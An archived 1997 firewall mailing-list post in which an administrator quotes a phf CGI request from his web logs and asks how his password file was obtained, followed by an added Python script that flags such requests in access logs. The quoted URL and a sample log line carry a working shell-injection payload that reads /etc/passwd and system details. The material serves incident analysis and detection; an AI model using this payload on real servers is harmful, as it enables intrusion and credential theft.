Great Circle Associates Firewalls
(June 1997)

Subject: psswd HACK
From: Stan Wnuck <swnuck @ unixpros . com>
Date: Thu, 5 Jun 97 10:10:54 EDT
To: firewalls @ GreatCircle . COM
Mailer: Elm [revision: 70.85]

Hello again,

Thanks for all of the responses that I have received on this.

One more question....
exactly how did they get my passwd file?

I typed in the URL from my log file into my browser....

http://myserver.somwhere.com/cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0

and I got this in return in my browser....

Query Results

/usr/local/bin/ph -m -s ns.uiuc.edu\ cat /etc/passwd\ ypcat passwd\ pwd\ id\ uname -a\ name=foo 


Where is the passwd file?


OK!  Let's say that they did get my passwd file.....
How much damage can they do if I have a firewall in place that my web server
sits behind?  The only services available from this host to the Internet are
http, dns, and smtp.  So services like ftp and telnet would be denied if they
tried.  Is there something I am missing?


Thanks again,



Stan Wnuck               swnuck @ unixpros . com
Unixpros, Inc.
10 Industrial Way East   (908) 389-3295 x542
Eatontown, NJ 07724      (908) 389-5461 Fax

PM-CHS Technology Insertion Office
Ft. Monmouth Army Base, NJ (908) 427-2033 / 427-6963

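The request quoted above works because phf hands its query fields to /usr/local/bin/ph through a shell, so an encoded newline (%0A) inside a field ends the ph command and starts a new one. The following detector, added here as an illustration and not part of the original post or the list archive, scans Common Log Format access-log lines for phf requests and reports any field carrying a newline together with the command lines it would have become; the log lines are constructed samples, with the first one modelled on the request in the post.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Common Log Format). The first
# mirrors the phf request shown in the post; the others are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jun/1997:09:12:31 -0400] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aid&Qname=foo HTTP/1.0" 200 512
10.0.0.6 - - [05/Jun/1997:09:13:02 -0400] "GET /cgi-bin/phf?Qname=foo&Qemail= HTTP/1.0" 200 128
10.0.0.7 - - [05/Jun/1997:09:14:10 -0400] "GET /index.html HTTP/1.0" 200 2048
"""

# client, timestamp, method, request target, status code
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def phf_findings(log_text):
    """Return one finding per phf request in the log text.

    A finding maps each query field that contains a newline to the
    list of lines that field decodes to: the first line is what ph was
    meant to receive, every following line is an extra shell command.
    """
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, ts, method, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/phf"):
            continue
        # parse_qs percent-decodes values, so %0A arrives as "\n";
        # keep_blank_values keeps the empty Q* fields visible.
        fields = parse_qs(parts.query, keep_blank_values=True)
        injected = {}
        for name, values in fields.items():
            for v in values:
                if "\n" in v:
                    injected[name] = v.split("\n")
        findings.append({
            "client": client, "time": ts, "status": status,
            "injected": injected, "shell_injection": bool(injected),
        })
    return findings


if __name__ == "__main__":
    for f in phf_findings(SAMPLE_LOG):
        print(f)
```

A request to phf is suspicious on its own, since almost no legitimate site used the CGI; a field containing a newline is the signature of the shell injection, whatever commands follow it.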

Follow-Ups:
  • Re: psswd HACK
    From: "Sameer R. Manek" <manek @ challenger . atc . fhda . edu>
  • Re: psswd HACK
    From: "Paul D. Robertson" <proberts @ clark . net>
